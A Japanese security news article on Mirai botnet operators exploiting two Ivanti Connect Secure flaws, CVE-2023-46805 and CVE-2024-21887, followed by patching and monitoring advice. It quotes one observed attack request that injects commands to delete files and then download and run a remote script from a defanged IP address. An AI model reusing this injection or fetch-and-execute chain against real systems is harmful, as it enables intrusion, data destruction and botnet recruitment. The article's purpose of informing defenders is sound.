Mirai Botnet Exploits Ivanti Vulnerabilities (CVE-2023-46805 & CVE-2024-21887)
2024/05/07 SecurityOnline — Ivanti Connect Secure (ICS) および Ivanti Policy Secure Gateway を標的とする攻撃の、きわめて危険なエスカレーションを、Juniper Threat Labs のセキュリティ研究者たちが発見した。この2つの脆弱性 CVE-2023-46805 (認証バイパス)/CVE-2024-21887 (リモートコード実行) を武器化する攻撃者たちは、悪名高い Mirai ボットネット・マルウェアを拡散している。この強力な組み合わせは、広範なネットワークにおける侵害と混乱への扉を開く。
脆弱性 CVE-2023-46805/CVE-2024-21887 は、Ivanti Connect Secure/Ivanti Policy Secure Gateway に影響するものだ。CVE-2023-46805 は、”/api/v1/totp/user-backup-code” エンドポイントでの、不十分なセキュリティ・チェックに起因する問題であり、攻撃者に対して認証バイパスを許すものである。2つ目の脆弱性 CVE-2024-21887 は、”/api/v1/license/key-status/;” API コールを介した任意のコマンド注入を攻撃者に許すものであり、システムの完全な侵害につながるものである。
これらの脆弱性の悪用に成功した攻撃者は、Mirai ボットネットの配信が容易になるため、潜在的な攻撃の深刻度が大幅に上昇している。攻撃者たちは脆弱なエンドポイントを介して、細工されたリクエストで悪意のスクリプトを実行し、侵害したシステムを効果的にボットネット・ノードへと置き換えていく。これらのノードは、分散型サービス拒否 (DDoS) 攻撃などの、さらなる悪意のアクティビティに使用される可能性を持つ。
観測された攻撃には、以下のようなコマンド・シーケンスが含まれていた:
GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1
このコマンドは、カレント・ディレクトリ内の全てのファイルを削除し、リモートサーバから “wtf.sh” という悪意のスクリプトをダウンロードし、実行可能なパーミッションを与えて実行するようシステムに指示するものだ。このスクリプトは、システムのディレクトリをナビゲートして、追加のペイロードをダウンロード/実行するチェーンの一部であり、侵害したシステム内に Mirai ボットネットを定着させる。
最善の防御策は多方面からのアプローチとなる:
即時のパッチ適用:Ivanti Connect Secure/Ivanti Policy Secure を使用している組織は、Ivanti がリリースしている重要なセキュリティ更新プログラムを、優先的にインストールする必要がある。それを怠ると、ネットワークは極めて脆弱な状態に陥る。
ネットワークの監視: 疑わしい活動を検出するために、堅牢なネットワーク監視ツールを導入する。それにより、異常なトラフィック・パターン/予期しない接続/不正なデバイスの動作を監視する。
セキュリティのベストプラクティス:ネットワークに接続された全てのデバイスに対して強力なパスワード・ポリシーを適用する。また、フィッシング詐欺による脅威や、ソフトウェア・アップデートの重要性について従業員を教育する。
同じく 5月7日に公開された、「MITRE への侵害:中国由来の APT UNC5221 の侵害の手法とマルウェアを分析する」でも、CVE-2023-46805/CVE-2024-21887 の連鎖が指摘されていました。この組み合わせは、2024/01/20 の「CISA 警告:Ivanti の脆弱性 CVE-2023-46805/CVE-2024-21887 の活発な悪用」で警告されているものでもあります。よろしければ、Ivanti で検索も、ご利用ください。
IoT OT Security News 
You must be logged in to post a comment.